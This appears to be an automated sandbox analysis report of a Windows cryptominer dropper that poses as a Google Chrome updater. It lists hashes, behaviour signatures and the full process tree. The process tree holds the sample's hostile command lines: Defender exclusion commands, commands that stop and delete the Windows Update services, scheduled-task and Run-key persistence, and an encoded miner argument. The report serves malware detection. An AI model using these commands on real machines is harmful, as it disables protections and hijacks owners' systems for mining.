Analysis
max time kernel: 300s
max time network: 296s
platform: windows10-1703_x64
resource: win10-20220812-en
resource tags: arch:x64, arch:x86, image:win10-20220812-en, locale:en-us, os:windows10-1703-x64, system
submitted: 03/12/2022, 23:32
Behavioral task
behavioral1
Sample
f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919.exe
Resource
win7-20220901-en
General
Target: f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919.exe
Size: 6.7MB
MD5: 57bc38aa4830968ccfd83ddf9417c93f
SHA1: 31b3dc9a13f1a9fffc2eeb272494bf60fc385338
SHA256: f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919
SHA512: 26f999a4748cb2a7e2b04bf08eef66e8a143927e8a7328592b812243a8e0ec16f91bb9aa353b6f5df9c7bd0f71503521f1e15ad4337a46517795e4163b36a9c7
SSDEEP: 196608:2rL58hRFrt1wspQDI9mW4VQ7JEuyHzqFMZMCO:6E3J6spIMmW73JMZMCO
Malware Config
Signatures
Modifies security service 2 TTPs 5 IoCs
- Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters (reg.exe)
- Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security (reg.exe)
- Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 (reg.exe)
- Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 (reg.exe)
- Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo (reg.exe)
Suspicious use of NtCreateUserProcessOtherParentProcess 12 IoCs
- PID 3844 (f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919.exe) created PID 2836, procid_target 53 (5 occurrences)
- PID 4860 (updater.exe) created PID 2836, procid_target 53 (7 occurrences)
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
- Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ (f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919.exe)
- Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ (updater.exe)
XMRig Miner payload 1 IoCs
- behavioral2/memory/344-672-0x00007FF62BC50000-0x00007FF62C444000-memory.dmp (yara_rule: xmrig)
Drops file in Drivers directory 2 IoCs
- File created C:\Windows\System32\drivers\etc\hosts (f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919.exe)
- File created C:\Windows\System32\drivers\etc\hosts (updater.exe)
Executes dropped EXE 1 IoCs
- PID 4860 updater.exe
Stops running service(s) 3 TTPs
YARA match: upx 1 IoCs
- behavioral2/memory/344-672-0x00007FF62BC50000-0x00007FF62C444000-memory.dmp (yara_rule: upx)
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion (f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919.exe)
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion (f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919.exe)
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion (updater.exe)
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion (updater.exe)
YARA match: themida 15 IoCs
- behavioral2/memory/3844-115-0x00007FF77BE60000-0x00007FF77CA9D000-memory.dmp
- behavioral2/memory/3844-116-0x00007FF77BE60000-0x00007FF77CA9D000-memory.dmp
- behavioral2/memory/3844-117-0x00007FF77BE60000-0x00007FF77CA9D000-memory.dmp
- behavioral2/memory/3844-118-0x00007FF77BE60000-0x00007FF77CA9D000-memory.dmp
- behavioral2/memory/3844-119-0x00007FF77BE60000-0x00007FF77CA9D000-memory.dmp
- behavioral2/memory/3844-121-0x00007FF77BE60000-0x00007FF77CA9D000-memory.dmp
- behavioral2/memory/3844-212-0x00007FF77BE60000-0x00007FF77CA9D000-memory.dmp
- behavioral2/files/0x0004000000015232-228.dat
- behavioral2/memory/4860-230-0x00007FF6225F0000-0x00007FF62322D000-memory.dmp
- behavioral2/memory/4860-231-0x00007FF6225F0000-0x00007FF62322D000-memory.dmp
- behavioral2/memory/4860-232-0x00007FF6225F0000-0x00007FF62322D000-memory.dmp
- behavioral2/memory/4860-233-0x00007FF6225F0000-0x00007FF62322D000-memory.dmp
- behavioral2/memory/4860-235-0x00007FF6225F0000-0x00007FF62322D000-memory.dmp
- behavioral2/files/0x0004000000015232-666.dat
- behavioral2/memory/4860-670-0x00007FF6225F0000-0x00007FF62322D000-memory.dmp
Checks whether UAC is enabled 2 IoCs
- Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA (f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919.exe)
- Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA (updater.exe)
Drops file in System32 directory 3 IoCs
- File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (powershell.exe)
- File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log (powershell.exe)
- File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (powershell.exe)
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
- PID 3844 f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919.exe
- PID 4860 updater.exe
Suspicious use of SetThreadContext 2 IoCs
- PID 4860 (updater.exe) set thread context of PID 4132, procid_target 116
- PID 4860 (updater.exe) set thread context of PID 344, procid_target 122
Drops file in Program Files directory 4 IoCs
- File created C:\Program Files\Google\Libs\g.log (cmd.exe)
- File created C:\Program Files\Google\Chrome\updater.exe (f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919.exe)
- File created C:\Program Files\Google\Libs\WR64.sys (updater.exe)
- File created C:\Program Files\Google\Libs\g.log (cmd.exe)
Launches sc.exe 10 IoCs
Sc.exe is a Windows utility to control services on the system.
- sc.exe PIDs: 4324, 3424, 2252, 2720, 1140, 3564, 2644, 4660, 4092, 4376
Modifies data under HKEY_USERS 64 IoCs
Suspicious behavior: EnumeratesProcesses 64 IoCs
Suspicious behavior: LoadsDriver 1 IoCs
- PID 600 (Process not Found)
Suspicious use of AdjustPrivilegeToken 64 IoCs
Suspicious use of WriteProcessMemory 62 IoCs
Processes
[1] C:\Windows\Explorer.EXE
    Command line: C:\Windows\Explorer.EXE
    PID:2836
  [2] C:\Users\Admin\AppData\Local\Temp\f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919.exe"
      - Suspicious use of NtCreateUserProcessOtherParentProcess
      - Identifies VirtualBox via ACPI registry values (likely anti-VM)
      - Drops file in Drivers directory
      - Checks BIOS information in registry
      - Checks whether UAC is enabled
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - Drops file in Program Files directory
      - Suspicious behavior: EnumeratesProcesses
      PID:3844
  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID:4512
  [2] C:\Windows\System32\cmd.exe
      Command line: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
      - Suspicious use of WriteProcessMemory
      PID:3584
    [3] C:\Windows\System32\sc.exe
        Command line: sc stop UsoSvc
        - Launches sc.exe
        PID:1140
    [3] C:\Windows\System32\sc.exe
        Command line: sc stop WaaSMedicSvc
        - Launches sc.exe
        PID:4324
    [3] C:\Windows\System32\sc.exe
        Command line: sc stop wuauserv
        - Launches sc.exe
        PID:4376
    [3] C:\Windows\System32\sc.exe
        Command line: sc stop bits
        - Launches sc.exe
        PID:3564
    [3] C:\Windows\System32\sc.exe
        Command line: sc stop dosvc
        - Launches sc.exe
        PID:2644
    [3] C:\Windows\System32\reg.exe
        Command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
        PID:4688
    [3] C:\Windows\System32\reg.exe
        Command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
        PID:4016
    [3] C:\Windows\System32\reg.exe
        Command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
        - Modifies security service
        PID:2976
    [3] C:\Windows\System32\reg.exe
        Command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
        PID:4788
    [3] C:\Windows\System32\reg.exe
        Command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
        PID:4716
  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#myhhgfd#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID:3540
  [2] C:\Windows\System32\cmd.exe
      Command line: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
      - Suspicious use of WriteProcessMemory
      PID:1084
    [3] C:\Windows\System32\powercfg.exe
        Command line: powercfg /x -hibernate-timeout-ac 0
        - Suspicious use of AdjustPrivilegeToken
        PID:4036
    [3] C:\Windows\System32\powercfg.exe
        Command line: powercfg /x -hibernate-timeout-dc 0
        - Suspicious use of AdjustPrivilegeToken
        PID:4392
    [3] C:\Windows\System32\powercfg.exe
        Command line: powercfg /x -standby-timeout-ac 0
        - Suspicious use of AdjustPrivilegeToken
        PID:4976
    [3] C:\Windows\System32\powercfg.exe
        Command line: powercfg /x -standby-timeout-dc 0
        - Suspicious use of AdjustPrivilegeToken
        PID:5028
  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zneglfoyv#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of WriteProcessMemory
      PID:4484
    [3] C:\Windows\system32\schtasks.exe
        Command line: "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
        PID:4968
  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
      - Drops file in System32 directory
      - Modifies data under HKEY_USERS
      - Suspicious behavior: EnumeratesProcesses
      PID:4888
  [2] C:\Windows\System32\cmd.exe
      Command line: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
      - Suspicious use of WriteProcessMemory
      PID:4028
    [3] C:\Windows\System32\sc.exe
        Command line: sc stop UsoSvc
        - Launches sc.exe
        PID:4660
    [3] C:\Windows\System32\sc.exe
        Command line: sc stop WaaSMedicSvc
        - Launches sc.exe
        PID:3424
    [3] C:\Windows\System32\sc.exe
        Command line: sc stop wuauserv
        - Launches sc.exe
        PID:2252
    [3] C:\Windows\System32\sc.exe
        Command line: sc stop bits
        - Launches sc.exe
        PID:2720
    [3] C:\Windows\System32\sc.exe
        Command line: sc stop dosvc
        - Launches sc.exe
        PID:4092
    [3] C:\Windows\System32\reg.exe
        Command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
        PID:4828
    [3] C:\Windows\System32\reg.exe
        Command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
        PID:696
    [3] C:\Windows\System32\reg.exe
        Command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
        PID:2644
    [3] C:\Windows\System32\reg.exe
        Command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
        PID:4388
    [3] C:\Windows\System32\reg.exe
        Command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
        PID:3448
  [2] C:\Windows\System32\cmd.exe
      Command line: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
      - Suspicious use of WriteProcessMemory
      PID:4784
    [3] C:\Windows\System32\powercfg.exe
        Command line: powercfg /x -hibernate-timeout-ac 0
        PID:2136
    [3] C:\Windows\System32\powercfg.exe
        Command line: powercfg /x -hibernate-timeout-dc 0
        PID:4668
    [3] C:\Windows\System32\powercfg.exe
        Command line: powercfg /x -standby-timeout-ac 0
        PID:4036
    [3] C:\Windows\System32\powercfg.exe
        Command line: powercfg /x -standby-timeout-dc 0
        PID:4384
  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#myhhgfd#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
      - Drops file in System32 directory
      - Modifies data under HKEY_USERS
      - Suspicious behavior: EnumeratesProcesses
      PID:1008
  [2] C:\Windows\System32\conhost.exe
      Command line: C:\Windows\System32\conhost.exe kfleahquehi
      - Suspicious behavior: EnumeratesProcesses
      PID:4132
    [3] C:\Windows\System32\cmd.exe
        Command line: C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
        - Drops file in Program Files directory
        PID:2492
  [2] C:\Windows\System32\cmd.exe
      Command line: C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
      - Drops file in Program Files directory
      - Suspicious use of WriteProcessMemory
      PID:2952
    [3] C:\Windows\System32\Wbem\WMIC.exe
        Command line: wmic PATH Win32_VideoController GET Name, VideoProcessor
        - Modifies data under HKEY_USERS
        PID:3840
  [2] C:\Windows\System32\conhost.exe (level 2; command line with its encoded argument follows)
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe qjosysdnolwwzbsc GoySvqjslEz2cJjLp/l+rjzn6ce4jALjhSdARaKlIdOzscb8uSA4DC45OD1DpPEqwn6vckAqS7SwZBHmWfSXaoYPV5nF5hTjq2epH65KwNo9lXjxaX7KyBDQ9wTlDmUyUC+oUs02ckKl1ssjG3/geDSTbyqoDAGDRxVlNzsfIHK9jTKb41kkt5n5KU3N0Quo/PGA9zlisO7lVe8SE+rkGyntU1fmaH3axIruRYdl/jwpgiyjxwLGtc6v6EqhF8Y//wqc4DLjxoML3CNLKlunEmrYb4h2eim5E/v5ur7MeJhAgSNi+g/oyV2b3B6L2NmJWK44j/1PmtzJdtTTjUwWRqlta/ahTq/+dpQPXgFJnSzXSrMxkKo/DX1UjiEO6EZkutvT8vEDAT5kxHv9ZLCKlKkJ3uqdAFqloYaVbbwogLJFee/cR8Mos6dW3oZ4LvaMe4O0ga8CszjkHqad5ywliajU1jFFEA4in7m8Y2aWveg=2⤵
- Suspicious behavior: EnumeratesProcesses
PID:344
[1] C:\Program Files\Google\Chrome\updater.exe
    Command line: "C:\Program Files\Google\Chrome\updater.exe"
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Checks BIOS information in registry
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:4860
Downloads
Filesize: 6.7MB
MD5: 57bc38aa4830968ccfd83ddf9417c93f
SHA1: 31b3dc9a13f1a9fffc2eeb272494bf60fc385338
SHA256: f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919
SHA512: 26f999a4748cb2a7e2b04bf08eef66e8a143927e8a7328592b812243a8e0ec16f91bb9aa353b6f5df9c7bd0f71503521f1e15ad4337a46517795e4163b36a9c7

Filesize: 226B
MD5: fdba80d4081c28c65e32fff246dc46cb
SHA1: 74f809dedd1fc46a3a63ac9904c80f0b817b3686
SHA256: b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398
SHA512: b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29

Filesize: 3KB
MD5: 8592ba100a78835a6b94d5949e13dfc1
SHA1: 63e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256: fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA512: 87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

Filesize: 1KB
MD5: 544ab21b3b347554805bb74b622b58b7
SHA1: ea6a2e9e49fe839adb8d115e0f11a836aa229fa1
SHA256: 543e4393a73f4ef802cc146cea67ee314afe4573a93f8f4163ed99ed5364f6c8
SHA512: 56123592bd294a5e19771112e09143065e0bd5636e0d94f662dab86bb5dbca8dd19052269f67414be0edd26068feb620cd1bb27563b392e3053566a45de41a83

Filesize: 1KB
MD5: ef411b98999dda40218b3c7bda8063df
SHA1: 737a5c040d01933971af69a6bf3e336e33626295
SHA256: 8af1449baf0e05c2c386911f6a828c14de7db7440df0217f612126bd9e021485
SHA512: 246711be2135933e7d163702dd1b4bb1240d60a0e7917564102ef69b3b7718f234696c03644403a262ba7d1b8cea073bd6ed5781c4f6902f2ffa3aae9e67ec84

Filesize: 2KB
MD5: 4ac8a26e2cee1347880edccb47ab30ea
SHA1: a629f6d453014c9dccb98987e1f4b0a3d4bdd460
SHA256: de574c85b289f23bba4b932a4c48397c4c61904cb6df086726dd7f8049624c3a
SHA512: fc2af80b2e84ae114ae06144b9ec41eed50250e20f18db3d114ac8d2c59ebbfcd440f59d12f173ea6a94bcf394b0cecee9e120265112b7043bf9e2bd636d6a8a

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize: 3KB
MD5: 811d351aabd7b708fef7683cf5e29e15
SHA1: 06fd89e5a575f45d411cf4b3a2d277e642e73dbb
SHA256: 0915139ab02088c3932bcc062ce22d4e9c81aa6df0eacd62900d73d7ad2d3b18
SHA512: 702d847c2aa3c9526ddf34249de06e58f5e3182d6ef66f77ddbdbbd2e9836026da6eacac2c892cf186d79bdc227a85c14f493b746c03233ef8820d981721c70a

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize: 1KB
MD5: 302a7c179ef577c237c5418fb770fd27
SHA1: 343ef00d1357a8d2ff6e1143541a8a29435ed30c
SHA256: 9e6b50764916c21c41d6e7c4999bdf27120c069ec7a9268100e1ce5df845149f
SHA512: f2472371a322d0352772defb959ea0a9da0d5ca8f412f6abafac2e6547bcc8a53394a6fb81b488521fc256bfc9f3205d92c6b69d6d139bdb260fb46578946699